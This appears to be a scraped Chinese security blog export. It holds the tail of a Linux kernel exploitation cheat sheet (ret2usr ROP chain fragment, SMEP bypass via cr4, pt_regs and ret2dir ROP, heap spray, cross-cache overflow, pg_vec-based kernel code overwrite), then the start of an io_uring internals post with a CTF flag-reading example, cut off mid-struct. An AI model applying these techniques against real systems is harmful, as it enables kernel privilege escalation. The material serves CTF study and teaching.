modprobe_path 的地址。 poweroff_cmd 类似于modprobe_path 修改 poweroff_cmd 为指定的程序。 劫持控制流执行 __orderly_poweroff。 关于如何定位 poweroff_cmd，我们可以采用类似于定位 modprobe_path 的方法。 一些宏 以下列出了常用的一些宏 123456789101112131415161718192021222324252627282930313233343536#define ___GFP_DMA 0x01u#define ___GFP_HIGHMEM 0x02u#define ___GFP_DMA32 0x04u#define ___GFP_MOVABLE 0x08u#define ___GFP_RECLAIMABLE 0x10u#define ___GFP_HIGH 0x20u#define ___GFP_IO 0x40u#define ___GFP_FS 0x80u#define ___GFP_ZERO 0x100u/* 0x200u unused */#define ___GFP_DIRECT_RECLAIM 0x400u#define ___GFP_KSWAPD_RECLAIM 0x800u#define ___GFP_WRITE 0x1000u#define ___GFP_NOWARN 0x2000u#define ___GFP_RETRY_MAYFAIL 0x4000u#define ___GFP_NOFAIL 0x8000u#define ___GFP_NORETRY 0x10000u#define ___GFP_MEMALLOC 0x20000u#define ___GFP_COMP 0x40000u#define ___GFP_NOMEMALLOC 0x80000u#define ___GFP_HARDWALL 0x100000u#define ___GFP_THISNODE 0x200000u#define ___GFP_ACCOUNT 0x400000u#define ___GFP_ZEROTAGS 0x800000u#ifdef CONFIG_KASAN_HW_TAGS#define ___GFP_SKIP_ZERO 0x1000000u#define ___GFP_SKIP_KASAN 0x2000000u#else#define ___GFP_SKIP_ZERO 0#define ___GFP_SKIP_KASAN 0#endif#ifdef CONFIG_LOCKDEP#define ___GFP_NOLOCKDEP 0x4000000u#else#define ___GFP_NOLOCKDEP 0#endif 123456#define __GFP_DMA ((__force gfp_t)___GFP_DMA)#define __GFP_HIGHMEM ((__force gfp_t)___GFP_HIGHMEM)#define __GFP_DMA32 ((__force gfp_t)___GFP_DMA32)#define __GFP_MOVABLE ((__force gfp_t)___GFP_MOVABLE) /* ZONE_MOVABLE allowed */#define GFP_ZONEMASK (__GFP_DMA|__GFP_HIGHMEM|__GFP_DMA32|__GFP_MOVABLE) 12345#define __GFP_RECLAIMABLE ((__force gfp_t)___GFP_RECLAIMABLE)#define __GFP_WRITE ((__force gfp_t)___GFP_WRITE)#define __GFP_HARDWALL ((__force gfp_t)___GFP_HARDWALL)#define __GFP_THISNODE ((__force gfp_t)___GFP_THISNODE)#define __GFP_ACCOUNT ((__force gfp_t)___GFP_ACCOUNT) 123#define __GFP_HIGH ((__force gfp_t)___GFP_HIGH)#define __GFP_MEMALLOC ((__force gfp_t)___GFP_MEMALLOC)#define __GFP_NOMEMALLOC ((__force gfp_t)___GFP_NOMEMALLOC) 12345678#define __GFP_IO ((__force gfp_t)___GFP_IO)#define __GFP_FS ((__force gfp_t)___GFP_FS)#define __GFP_DIRECT_RECLAIM ((__force gfp_t)___GFP_DIRECT_RECLAIM) /* Caller can reclaim */#define __GFP_KSWAPD_RECLAIM ((__force gfp_t)___GFP_KSWAPD_RECLAIM) /* kswapd can wake */#define __GFP_RECLAIM ((__force gfp_t)(___GFP_DIRECT_RECLAIM|___GFP_KSWAPD_RECLAIM))#define __GFP_RETRY_MAYFAIL ((__force gfp_t)___GFP_RETRY_MAYFAIL)#define __GFP_NOFAIL ((__force gfp_t)___GFP_NOFAIL)#define __GFP_NORETRY ((__force gfp_t)___GFP_NORETRY) 1234567891011121314151617181920212223242526272829#define __GFP_NOWARN ((__force gfp_t)___GFP_NOWARN)#define __GFP_COMP ((__force gfp_t)___GFP_COMP)#define __GFP_ZERO ((__force gfp_t)___GFP_ZERO)#define __GFP_ZEROTAGS ((__force gfp_t)___GFP_ZEROTAGS)#define __GFP_SKIP_ZERO ((__force gfp_t)___GFP_SKIP_ZERO)#define __GFP_SKIP_KASAN ((__force gfp_t)___GFP_SKIP_KASAN)/* Disable lockdep for GFP context tracking */#define __GFP_NOLOCKDEP ((__force gfp_t)___GFP_NOLOCKDEP)/* Room for N __GFP_FOO bits */#define __GFP_BITS_SHIFT (26 + IS_ENABLED(CONFIG_LOCKDEP))#define __GFP_BITS_MASK ((__force gfp_t)((1 &lt;&lt; __GFP_BITS_SHIFT) - 1))#define GFP_ATOMIC (__GFP_HIGH | __GFP_KSWAPD_RECLAIM)#define GFP_KERNEL (__GFP_RECLAIM | __GFP_IO | __GFP_FS)#define GFP_KERNEL_ACCOUNT (GFP_KERNEL | __GFP_ACCOUNT)#define GFP_NOWAIT (__GFP_KSWAPD_RECLAIM)#define GFP_NOIO (__GFP_RECLAIM)#define GFP_NOFS (__GFP_RECLAIM | __GFP_IO)#define GFP_USER (__GFP_RECLAIM | __GFP_IO | __GFP_FS | __GFP_HARDWALL)#define GFP_DMA __GFP_DMA#define GFP_DMA32 __GFP_DMA32#define GFP_HIGHUSER (GFP_USER | __GFP_HIGHMEM)#define GFP_HIGHUSER_MOVABLE (GFP_HIGHUSER | __GFP_MOVABLE | __GFP_SKIP_KASAN)#define GFP_TRANSHUGE_LIGHT ((GFP_HIGHUSER_MOVABLE | __GFP_COMP | \\ __GFP_NOMEMALLOC | __GFP_NOWARN) &amp; \\ ~__GFP_RECLAIM)#define GFP_TRANSHUGE (GFP_TRANSHUGE_LIGHT | __GFP_DIRECT_RECLAIM) 此部分来自 https://elixir.bootlin.com/linux/v6.7.8/source/include/linux/gfp_types.h 如果需要快速知道对应的宏的值，可以直接用C 来 printf 如GFP_KERNEL: 0x6000C0 攻击方法 ROP ret2usr pt_regs sycrop ret2dir heap heap spray heap overflow double free Cross cache overflow page level heap fenshui Race Condition USMA 基于idt的内存搜索 ROP ret2usr 由于KPTI的出现，ret2usr实际上已经不可用了，这里介绍一下ret2usr仅仅是为了拓展了解。 简单来说，ret2usr的核心就是利用内核的ring 0权限，执行用户空间的代码来实现提权。 一个典型的ret2usr rop链： 123456789rop_chain[i++] = (size_t)getRootPrivilige; rop_chain[i++] = SWAPGS_POPFQ_RET + offset; rop_chain[i++] = 0; rop_chain[i++] = IRETQ + offset; rop_chain[i++] = (size_t)getRootShell; rop_chain[i++] = user_cs; rop_chain[i++] = user_rflags; rop_chain[i++] = user_sp; rop_chain[i++] = user_ss; 这里的getRootPrivilige就是用户态的 提权代码。 绕过SMAP与SMEP SMAP和SMEP是 x64 限制内核和用户空间的数据访问的一个架构功能，通过CR4寄存器的低位来判断是否开启。 开启后 从内核态访问用户态的数据会直接panic，因此通过在ROP链中插入 修改 cr4 寄存器的gadget即可绕过 gdb 无法查看 cr4 寄存器的值，可以通过 kernel crash 时的信息查看。为了关闭 smep 保护，常用一个固定值 0x6f0，即 mov cr4, 0x6f0。 KPTI如何限制ret2usr 最后讨论一下KPTI的实现 When PTI is enabled, the kernel manages two sets of page tables. The first set is very similar to the single set which is present in kernels without PTI. This includes a complete mapping of userspace that the kernel can use for things like copy_to_user(). Although complete, the user portion of the kernel page tables is crippled by setting the NX bit in the top level. This ensures that any missed kernel-&gt;user CR3 switch will immediately crash userspace upon executing its first instruction. The userspace page tables map only the kernel data needed to enter and exit the kernel. This data is entirely contained in the ‘struct cpu_entry_area’ structure which is placed in the fixmap which gives each CPU’s copy of the area a compile-time-fixed virtual address. For new userspace mappings, the kernel makes the entries in its page tables like normal. The only difference is when the kernel makes entries in the top (PGD) level. In addition to setting the entry in the main kernel PGD, a copy of the entry is made in the userspace page tables’ PGD. This sharing at the PGD level also inherently shares all the lower layers of the page tables. This leaves a single, shared set of userspace page tables to manage. One PTE to lock, one set of accessed bits, dirty bits, etc… KPTI维护两套页表，一套和没有开启KPTI 时的页表类似，拥有用户态和内核态的完整映射，这是给内核态使用的，不同的是， 此页表对于用户态内存空间的映射，是没有可执行权限的，这里权限的限制是通过页表的权限位来实现的，因此ret2usr如果关闭了smap和smep，尽管可以访问到用户态数据，但是无法执行用户态代码； 此外，供给用户态的页表，拥有用户态的完整映射和内核的部分映射，这部分映射仅包含进入和离开内核态的代码。 pt_regs 与 KROP 在5.xx版本（笔者还没有检查具体是哪些版本），或者高版本没有开启如下选项时： 1CONFIG_RANDOMIZE_KSTACK_OFFSET pt_regs是进入内核态时，压入栈中的结构 12345678910111213141516171819202122232425262728293031323334struct pt_regs &#123; /* * C ABI says these regs are callee-preserved. They aren&#x27;t saved on kernel entry * unless syscall needs a complete, fully filled &quot;struct pt_regs&quot;. */ unsigned long r15; unsigned long r14; unsigned long r13; unsigned long r12; unsigned long rbp; unsigned long rbx; /* These regs are callee-clobbered. Always saved on kernel entry. */ unsigned long r11; unsigned long r10; unsigned long r9; unsigned long r8; unsigned long rax; unsigned long rcx; unsigned long rdx; unsigned long rsi; unsigned long rdi; /* * On syscall entry, this is syscall#. On CPU exception, this is error code. * On hw interrupt, it&#x27;s IRQ number: */ unsigned long orig_rax; /* Return frame for iretq */ unsigned long rip; unsigned long cs; unsigned long eflags; unsigned long rsp; unsigned long ss; /* top of stack page */ &#125;; 我们注意到，这些内容，由用户态的寄存器决定，可以由我们控制。 因此这些部分可以用于布置ROP链， 当劫持到内核某个结构体的函数指针时，只需要寻找到一条形如 “add rsp, val ; ret” 的 gadget 便能够完成 ROP 具体而言，当通过syscall触发进入内核态前，我们通过在用户态控制所有寄存器，之后，触发syscall时，在syscall_entry 会将用户态的所有寄存器压入栈中来保存运行状态，这时，如果我们能劫持控制流，并通过类似 add rsp, val ; ret 的gadget来迁移栈，在我们可以控制的pt_regs上进行ROP 然而，在之后的内核版本中，加入了 CONFIG_RANDOMIZE_KSTACK_OFFSET ， 使得在进入内核时，会产生一个随机栈偏移，使得此利用的稳定性下降。 ret2dir 内核堆区 direct_mapping_arean 存在对于整个物理内存的映射，因此，通过mmap在用户态喷射的匿名页面，实际上也从此分配。 通过mmap大量分配，可以获取到 kernel 上一块近乎连续的物理内存，因此，通过不断堆喷布置gadget滑块，然后随机选择一个内核基地址进行栈迁移，最终就有很大概率命中我们写入的页面。 sycrop 通过下硬件断点在用户态触发的方式，可以将寄存器内容推送到与 per_cpu_entry_area 固定偏移的DB stack上，而在linux 6.2之前， per_cpu_entry_area 没有加入随机化，地址固定，所以可以达到在内核固定地址造ROP链的手段 work_for_cpu_fn 这实际上是一个tricks，在内核很难ROP时，可以利用 12345678static void work_for_cpu_fn(struct work_struct *work)&#123; struct work_for_cpu *wfc = container_of(work, struct work_for_cpu, work); wfc-&gt;ret = wfc-&gt;fn(wfc-&gt;arg);&#125; 在劫持rsi的情况。 这个函数可以实现执行一次函数调用，并将返回值保存 overview 注意到，上述列出的几个攻击方法，实际上核心问题就是ROP链写在哪些地方。 pt_regs: 写在内核栈上 ret2dir： 写在direct mapping arena sycrop: 写在加入随机化的区域 由于ROP可以很方便劫持控制流，所以使用ROP攻击内核时，一般使用 commit_cred 进行提权 遗憾的是，在高版本内核，由于CFI的引入，很多时候难以找到完善的gadget进行利用，限制了ROP的使用 heap UAF 有效大小Obj的UAF和良好的kmalloc flag 这里主要指和内核关键结构体存在同样的分配size和flag的UAF， 如 tty_operations 或 seq_operations 等等。 利用这些结构的UAF可以直接leak 内核数据或者劫持控制流，这个攻击流程就不赘述了。 任意大小的UAF 接下来讲述一下任意大小UAF(也没有那么任意)的利用 CVE-2021-22555： 基于msg_msg的堆喷 | GFP_KERNEL_ACCOUNT 基于add_key的堆喷 UASM 见后文UASM的利用 cross cache UAF #TODO heap overflow 基础overflow 同上文，存在特定结构体的Overflow， 因此可以非常方便地控制一个有效结构，此时的利用非常简单。 cross_cache overflow | 打破slab隔离 众所周知，slab之间存在隔离，因此，如果溢出点在一个特定size的slab，此时，就无法通过直接的溢出劫持控制流。 但是，还是存在在buddy system溢出的办法。 考虑到堆喷耗尽buddy system的低位单页内存，那么之后从slab分配就会从高位连续的页面中切分，此时，就可以使得分配的页面来自一块近乎物理连续的内存，此时，如果在某个页面末尾的slab溢出，那么就可以溢出到下一个页面。 如果下一个页面，被另一个cache申请用来分配另外一种slab，此时就可以实现跨cache的溢出，从而控制有意义的cache. 基于pipe_buffer的溢出通解 #TODO Race condition double feach 由于内核模块是全局的，如果对于内核模块的数据访问没有加锁，就很有可能出现竞态漏洞。 userfault 在linux 5.11以下可用。 主要是用来辅助条件竞争漏洞。 userfault是一个在用户态进行缺页处理接口。 在正常情况下， race condition的时间窗口是很短暂的，如果能够通过userfault 将操作停住，就能够将竞争的时间窗口扩大，实现竞争。 fuse // 通过CVE分析fuse的利用 #TODO UASM 来自 https://vul.360.net/archives/391 的利用 这个利用笔者最初有点犹豫放在哪个部分。 最后笔者还是决定将内容单独列一个二级目录，因为笔者认为这代表了一种新的利用方法， 不仅仅是 pg_vec， 在io_uring中，同样存在着内核和用户地址的共同映射，有没有可能也利用此来利用呢。 甚至直接对内核页表进行修改，实际上也可以归结为这种利用的一部分。 更进一步的， 笔者认为，UASM 也许可以用在page level uaf中（由于笔者太菜了，暂时先码着）。 简单而言，在创建socket并设置packet后，此时，内核维护一个 pg_vec 数组，每一个数组地址对应着一个虚拟地址。 此时，如果能够通过UAF或者溢出修改pg_vec， 然后再在用户态调用mmap，内核实际上: 12345678910111213141516171819/net/packet/af_packet.cstatic int packet_mmap(file, sock, vma)&#123; for (rb = &amp;po-&gt;rx_ring; rb &lt;= &amp;po-&gt;tx_ring; rb++) &#123; for (i = 0; i &lt; rb-&gt;pg_vec_len; i++) &#123; struct page *page; void *kaddr = rb-&gt;pg_vec[i].buffer; for (pg_num = 0; pg_num &lt; rb-&gt;pg_vec_pages; pg_num++) &#123; page = pgv_to_page(kaddr); err = vm_insert_page(vma, start, page); if (unlikely(err)) goto out; start += PAGE_SIZE; kaddr += PAGE_SIZE; &#125; &#125; &#125; return err;&#125; 通过vm_insert_page 将这些页，插入了用户态地址空间。 这些页需要满足如下要求 page不为匿名页 不为Slab子系统分配的页 page不含有type 这就限制了使用内核堆的页面。 123456789/mm/memory.cstatic int validate_page_before_insert(struct page *page) &#123; if (PageAnon(page) || PageSlab(page) || page_has_type(page)) return -EINVAL; flush_dcache_page(page); return 0; &#125; 值得一提的是，这里pg_vec原来的虚拟地址原来的权限是无所谓的，因为并没有对原来虚拟地址的内存权限（也即这个页表项的内存权限）进行检查。 因此我们可以直接修改内核代码段或者内核模块代码段、数据段。 而且线性映射区域存在内核的全部映射，可以在这个地址范围找到上述页面。 更妙的是，pg_vec可以由用户态决定，不过其分配flag是GFP_KERNEL 相比于ROP，利用更加简单，并且不受CFI的影响。 dirtypagetable #TODO POP | page level ROP 来自blachhat2021的一种思路，主要是用来拓展脑洞，实际利用起来不如UASM直接改内核代码方便。但是很有传统利用的美感。 #TODO tricks 基于inter硬件漏洞的leak tricks 在内核“堆基址”（page_offset_base） + 0x9d000 处存放着 secondary_startup_64 函数的地址 从CTF到实战利用的哲思 #TODO","categories":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/categories/Pwn/"}],"tags":[{"name":"Pwn","slug":"Pwn","permalink":"https://v3rdant.cn/tags/Pwn/"},{"name":"linux","slug":"linux","permalink":"https://v3rdant.cn/tags/linux/"},{"name":"CTF","slug":"CTF","permalink":"https://v3rdant.cn/tags/CTF/"},{"name":"Kernel","slug":"Kernel","permalink":"https://v3rdant.cn/tags/Kernel/"}]},{"title":"Linux.io_uring-Top-down-Approach","slug":"Linux.io_uring-Top-down-Approach","date":"2023-12-04T06:08:56.000Z","updated":"2024-03-05T00:46:36.001Z","comments":true,"path":"Linux.io_uring-Top-down-Approach/","link":"","permalink":"https://v3rdant.cn/Linux.io_uring-Top-down-Approach/","excerpt":"最近在N1线下赛遇见一个seccomp沙箱，限制了只能使用 io_uring_setup 一个系统调用，之前不久的ACTF中， 使用mmap、io_uring_setup、io_uring_enter 三个系统调用，完成了orw。 如何仅仅使用 io_uring_setup 完成orw呢？ 本文将不仅仅局限于CTF，而是从io_uring的实现出发，先从宏观角度透视io_uring的实现框架， 然后以源代码为基础，自顶向下，从liburing，到内核io_uring的用户态接口， 最后到io_uring的内核实现，一步步聚焦 io_uring 具体的实现。 由于笔者的研究方向的是二进制安全，因此笔者将更多关注 io_uring 中用户和内核态的通信这一容易产生安全漏洞的模块，而不会聚焦io_uring的异步调度和任务处理，以上。","text":"最近在N1线下赛遇见一个seccomp沙箱，限制了只能使用 io_uring_setup 一个系统调用，之前不久的ACTF中， 使用mmap、io_uring_setup、io_uring_enter 三个系统调用，完成了orw。 如何仅仅使用 io_uring_setup 完成orw呢？ 本文将不仅仅局限于CTF，而是从io_uring的实现出发，先从宏观角度透视io_uring的实现框架， 然后以源代码为基础，自顶向下，从liburing，到内核io_uring的用户态接口， 最后到io_uring的内核实现，一步步聚焦 io_uring 具体的实现。 由于笔者的研究方向的是二进制安全，因此笔者将更多关注 io_uring 中用户和内核态的通信这一容易产生安全漏洞的模块，而不会聚焦io_uring的异步调度和任务处理，以上。 overview 在开始前，首先介绍一下什么是io_uring 。 io_uring 是 Linux 5.1 引入的一套新的异步 I/O 接口机制,主要有以下特点: 高效 - 通过共享内存和锁自由的接口设计大大降低了系统调用开销。 灵活 - 支持阻塞,非阻塞,轮询多种调用方式,可以同时提交多个 I/O 请求并通过轮询或异步方式得到完成通知。 通用 - 支持文件,网络,时间,引用计数等多种 I/O,统一了异步 I/O 接口。 io_uring 主要由提交队列(SQ)、完成队列(CQ)、SQEs 请求和 CQEs 结果组成。 其中SQE和CQE 分别是SQ和CQ中的一个实体。 应用通过mmap映射SQ和CQ,向SQ提交I/O请求,再通过读CQ获取I/O完成结果。这避免了大量的 context switch 和系统调用开销。 这里以ACTF星盟的师傅写的liburing实现orw的一个小例子来介绍一下io_uring 的工作原理 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131// ref from https://blog.xmcve.com/2023/10/31/ACTF-2023-Writeup/#title-9#define _GNU_SOURCE#include &lt;stdio.h&gt;#include &lt;fcntl.h&gt;#include &lt;string.h&gt;#include &lt;liburing.h&gt;#include &lt;unistd.h&gt;#include &lt;syscall.h&gt;#include &lt;sys/prctl.h&gt;#define QUEUE_DEPTH 1int main() &#123; struct io_uring ring = &#123;0&#125;; struct io_uring_sqe *sqe; struct io_uring_cqe *cqe; int fd, ret; char buffer[4096] = &#123;0&#125;; if (io_uring_queue_init(QUEUE_DEPTH, &amp;ring, 0) &lt; 0) &#123; perror(&quot;io_uring_queue_init&quot;); return 1; &#125; // 准备打开操作 sqe = io_uring_get_sqe(&amp;ring); if (!sqe) &#123; fprintf(stderr, &quot;Failed to get SQE\\n&quot;); return 1; &#125; int dirfd = AT_FDCWD; // 当前工作目录的文件描述符 const char *pathname = &quot;./flag&quot;; int flags = O_RDONLY; io_uring_prep_openat(sqe, dirfd, pathname, flags, 0); io_uring_sqe_set_data(sqe, NULL); // 提交请求 ret = io_uring_submit(&amp;ring); if (ret &lt; 0) &#123; perror(&quot;io_uring_submit&quot;); return 1; &#125; // 等待完成 ret = io_uring_wait_cqe(&amp;ring, &amp;cqe); if (ret &lt; 0) &#123; perror(&quot;io_uring_wait_cqe&quot;); return 1; &#125; // 处理完成的请求 if (cqe-&gt;res &lt; 0) &#123; fprintf(stderr, &quot;Open error: %d\\n&quot;, cqe-&gt;res); return 1; &#125; fd = cqe-&gt;res; // 获取打开的文件描述符 // 准备读取操作 sqe = io_uring_get_sqe(&amp;ring); if (!sqe) &#123; fprintf(stderr, &quot;Failed to get SQE\\n&quot;); return 1; &#125; io_uring_prep_read(sqe, fd, buffer, sizeof(buffer), 0); io_uring_sqe_set_data(sqe, NULL); // 提交请求 ret = io_uring_submit(&amp;ring); if (ret &lt; 0) &#123; perror(&quot;io_uring_submit&quot;); return 1; &#125; // 等待完成 ret = io_uring_wait_cqe(&amp;ring, &amp;cqe); if (ret &lt; 0) &#123; perror(&quot;io_uring_wait_cqe&quot;); return 1; &#125; // 处理完成的请求 if (cqe-&gt;res &lt; 0) &#123; fprintf(stderr, &quot;Read error: %d\\n&quot;, cqe-&gt;res); return 1; &#125; // 准备写操作 sqe = io_uring_get_sqe(&amp;ring); if (!sqe) &#123; fprintf(stderr, &quot;Failed to get SQE\\n&quot;); return 1; &#125; io_uring_prep_write(sqe, 1, buffer, strlen(buffer), 0); io_uring_sqe_set_data(sqe, NULL); // 提交请求 ret = io_uring_submit(&amp;ring); if (ret &lt; 0) &#123; perror(&quot;io_uring_submit&quot;); return 1; &#125; // 等待完成 ret = io_uring_wait_cqe(&amp;ring, &amp;cqe); if (ret &lt; 0) &#123; perror(&quot;io_uring_wait_cqe&quot;); return 1; &#125; // 处理完成的请求 if (cqe-&gt;res &lt; 0) &#123; fprintf(stderr, &quot;Read error: %d\\n&quot;, cqe-&gt;res); return 1; &#125; // printf(&quot;Read %d bytes: %s\\n&quot;, cqe-&gt;res, buffer); // 清理并关闭文件 io_uring_cqe_seen(&amp;ring, cqe); io_uring_queue_exit(&amp;ring); close(fd); sleep(1); return 0;&#125; 可以看到，如果要使用io_uring会经历如下流程： 首先通过 io_uring_queue_init 完成了初始化，io_uring的sq和cq队列也被创建 在库内部实际上是使用 io_uring_setup 和 mmap 两个syscall实现 前者完成了内核中相应结构体和资源的创建，后者将两个队列映射到用户态内存，通过共享内存方便用户态访问 1234if (io_uring_queue_init(QUEUE_DEPTH, &amp;ring, 0) &lt; 0) &#123; perror(&quot;io_uring_queue_init&quot;); return 1;&#125; 然后，用户使用 io_uring_get_sqe 得到一个sqe，(SQ队列中的一个实体) ，并根据所要完成的任务，设置sqe的各个成员， 这个过程是完全在用户态完成的 123456789101112sqe = io_uring_get_sqe(&amp;ring);if (!sqe) &#123; fprintf(stderr, &quot;Failed to get SQE\\n&quot;); return 1;&#125;int dirfd = AT_FDCWD; // 当前工作目录的文件描述符const char *pathname = &quot;./flag&quot;;int flags = O_RDONLY;io_uring_prep_openat(sqe, dirfd, pathname, flags, 0);io_uring_sqe_set_data(sqe, NULL); 最后，通过 io_uring_submit 提交了请求，库内部实际上是调用了 io_uring_enter 1ret = io_uring_submit(&amp;ring); io_uring任务收割模式 这里主要解释一下 IORING_SETUP_SQPOLL 和 IORING_SETUP_IOPOLL 的区别 IORING_SETUP_SQPOLL When this flag is specified, a kernel thread is created to perform submission queue polling. An io_uring instance configured in this way enables an application to issue I/O without ever context switching into the kernel. By using the submission queue to fill in new submission queue entries and watching for completions on the completion queue, the application can submit and reap I/Os without doing a single system call. If the kernel thread is idle for more than sq_thread_idle milliseconds, it will set the IORING_SQ_NEED_WAKEUP bit in the flags field of the struct io_sq_ring. When this happens, the application must call io_uring_enter(2) to wake the kernel thread. If I/O is kept busy, the kernel thread will never sleep. An application making use of this feature will need to guard the io_uring_enter(2) call with the following code sequence: /* * Ensure that the wakeup flag is read after the tail pointer * has been written. It’s important to use memory load acquire * semantics for the flags read, as otherwise the application * and the kernel might not agree on the consistency of the * wakeup flag. */ unsigned flags = atomic_load_relaxed(sq_ring-&gt;flags); if (flags &amp; IORING_SQ_NEED_WAKEUP) io_uring_enter(fd, 0, 0, IORING_ENTER_SQ_WAKEUP); IORING_SETUP_IOPOLL Perform busy-waiting for an I/O completion, as opposed to getting notifications via an asynchronous IRQ (Interrupt Request). The file system (if any) and block device must support polling in order for this to work. Busy-waiting provides lower latency, but may consume more CPU resources than interrupt driven I/O. Currently, this feature is usable only on a file descriptor opened using the O_DIRECT flag. When a read or write is submitted to a polled context, the application must poll for completions on the CQ ring by calling io_uring_enter(2). It is illegal to mix and match polled and non-polled I/O on an io_uring instance. This is only applicable for storage devices for now, and the storage device must be configured for polling. How to do that depends on the device type in question. For NVMe devices, the nvme driver must be loaded with the poll_queues parameter set to the desired number of polling queues. The polling queues will be shared appropriately between the CPUs in the system, if the number is less than the number of online CPU threads. 即，SQPOLL 通过内核线程定时唤醒来收割任务 IOPOLL 通过 io_uring_enter 通知内核来收割任务 struct 其次，需要在讲解前，介绍一下 liburing 和 内核暴露出的一些结构体： liburing 首先是 io_uring 这是liburing 关于io_uring的核心管理结构体 12345678910111213struct io_uring &#123; struct io_uring_sq sq; // sq 管理结构体 struct io_uring_cq cq; // cq 管理结构体 unsigned flags; // setup时的flag设置 // 以下setup返回时写入params的一些信息 int ring_fd; unsigned features; int enter_ring_fd; __u8 int_flags; __u8 pad[3]; unsigned pad2;&#125;; io_uring_sq， sq的管理结构体， 这个结构体在6.5及以下的版本可以在内核中找到，在6.5以上的版本在内核中删除了，6.5以上存在io_rings，相当于io_uring_sq和io_uring_cq 的组合 1234567891011121314151617181920212223struct io_uring_sq &#123; unsigned *khead; unsigned *ktail; // Deprecated: use `ring_mask` instead of `*kring_mask` unsigned *kring_mask; // Deprecated: use `ring_entries` instead of `*kring_entries` unsigned *kring_entries; unsigned *kflags; unsigned *kdropped; unsigned *array; struct io_uring_sqe *sqes; unsigned sqe_head; unsigned sqe_tail; size_t ring_sz; void *ring_ptr; unsigned ring_mask; unsigned ring_entries; unsigned pad[2];&#125;; 在此着重解释一下ring_ptr和 sqes两个成员： 这两个成员，在没有设置NO_MMAP的情况下，都是由 io_uring_setup 后用mmap映射得到的。 ring_prt指向一连串内核用来处理io_uring时的信息，例如当前循环队列head和tail， io_uring_setup 返回时会设置 io_uring_params 中的 sq_off 结构，这个结构就记录了各个成员信息，相对于ring_ptr的偏移， 最后在 [[#io_uring_setup_ring_pointers]] 中设置相关变量指向和内核共享的内存区域中对应的偏移。 而sqes，就是真正的共享队列的区域 类似的，存在io_uring_cq 结构体 kernel 首先是io_uring_params 他是io_uring_setup 传入的参数，同时，返回时，kernel会给此结构体相应成员赋值. 此结构体也是提供给用户态的API 12345678910111213struct io_uring_params &#123; __u32 sq_entries; __u32 cq_entries; __u32 flags; __u32 sq_thread_cpu; // 内核任务处理线程占用的cpu __u32 sq_thread_idle; // 内核任务处理线程最大闲置时间， // 见`IORING_SETUP_SQPOLL` __u32 features; __u32 wq_fd; __u32 resv[3]; struct io_sqring_offsets sq_off; struct io_cqring_offsets cq_off;&#125;; 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970struct io_uring_sqe &#123; __u8 opcode; /* type of operation for this sqe */ __u8 flags; /* IOSQE_ flags */ __u16 ioprio; /* ioprio for the request */ __s32 fd; /* file descriptor to do IO on */ union &#123; __u64 off; /* offset into file */ __u64 addr2; struct &#123; __u32 cmd_op; __u32 __pad1; &#125;; &#125;; union &#123; __u64 addr; /* pointer to buffer or iovecs */ __u64 splice_off_in; &#125;; __u32 len; /* buffer size or number of iovecs */ union &#123; __kernel_rwf_t rw_flags; __u32 fsync_flags; __u16 poll_events; /* compatibility */ __u32 poll32_events; /* word-reversed for BE */ __u32 sync_range_flags; __u32 msg_flags; __u32 timeout_flags; __u32 accept_flags; __u32 cancel_flags; __u32 open_flags; __u32 statx_flags; __u32 fadvise_advice; __u32 splice_flags; __u32 rename_flags; __u32 unlink_flags; __u32 hardlink_flags; __u32 xattr_flags; __u32 msg_ring_flags; __u32 uring_cmd_flags; &#125;; __u64 user_data; /* data to be passed back at completion time */ /* pack this to avoid bogus arm OABI complaints */ union &#123; /* index into fixed buffers, if used */ __u16 buf_index; /* for grouped buffer selection */ __u16 buf_group; &#125; __attribute__((packed)); /* personality to use, if used */ __u16 personality; union &#123; __s32 splice_fd_in; __u32 file_index; struct &#123; __u16 addr_len; __u16 __pad3[1]; &#125;; &#125;; union &#123; struct &#123; __u64 addr3; __u64 __pad2[1]; &#125;; /* * If the ring is initialized with IORING_SETUP_SQE128, then * this field is used for 80 bytes of arbitrary command data */ __u8 cmd[0]; &#125;;&#125;; io_uring_sqe , 用来表征一个IO任务的sqe, 通过在sqes 环形队列上插入此结构体, 实现内核任务的提交. 其中大部分参数都是提交给相应的任务处理函数的参数. 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970struct io_uring_sqe &#123; __u8 opcode; // 任务的类型, 用一系列枚举变量来表示 __u8 flags; // 任务的一些标志位, 可以设置任务的一些特性 __u16 ioprio; /* ioprio for the request */ __s32 fd; /* file descriptor to do IO on */ union &#123; __u64 off; /* offset into file */ __u64 addr2; struct &#123; __u32 cmd_op; __u32 __pad1; &#125;; &#125;; union &#123; __u64 addr; /* pointer to buffer or iovecs */ __u64 splice_off_in; &#125;; __u32 len; /* buffer size or number of iovecs */ union &#123; __kernel_rwf_t rw_flags; __u32 fsync_flags; __u16 poll_events; /* compatibility */ __u32 poll32_events; /* word-reversed for BE */ __u32 sync_range_flags; __u32 msg_flags; __u32 timeout_flags; __u32 accept_flags; __u32 cancel_flags; __u32 open_flags; __u32 statx_flags; __u32 fadvise_advice; __u32 splice_flags; __u32 rename_flags; __u32 unlink_flags; __u32 hardlink_flags; __u32 xattr_flags; __u32 msg_ring_flags; __u32 uring_cmd_flags; &#125;; __u64 user_data; /* data to be passed back at completion time */ /* pack this to avoid bogus arm OABI complaints */ union &#123; /* index into fixed buffers, if used */ __u16 buf_index; /* for grouped buffer selection */ __u16 buf_group; &#125; __attribute__((packed)); /* personality to use, if used */ __u16 personality; union &#123; __s32 splice_fd_in; __u32 file_index; struct &#123; __u16 addr_len; __u16 __pad3[1]; &#125;; &#125;; union &#123; struct &#123; __u64 addr3; __u64 __pad2[1]; &#125;; /* * If the ring is initialized with IORING_SETUP_SQE128, then * this field is used for 80 bytes of arbitrary command data */ __u8 cmd[0]; &#125;;&#125;; io_ring_ctx 是kernel io_uring运行的上下文，记录了io_uring 运行时需要保存的一些信息，这里就不一一分析每个成员了 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188struct io_ring_ctx &#123; /* const or read-mostly hot data */ struct &#123; unsigned int flags; unsigned int drain_next: 1; unsigned int 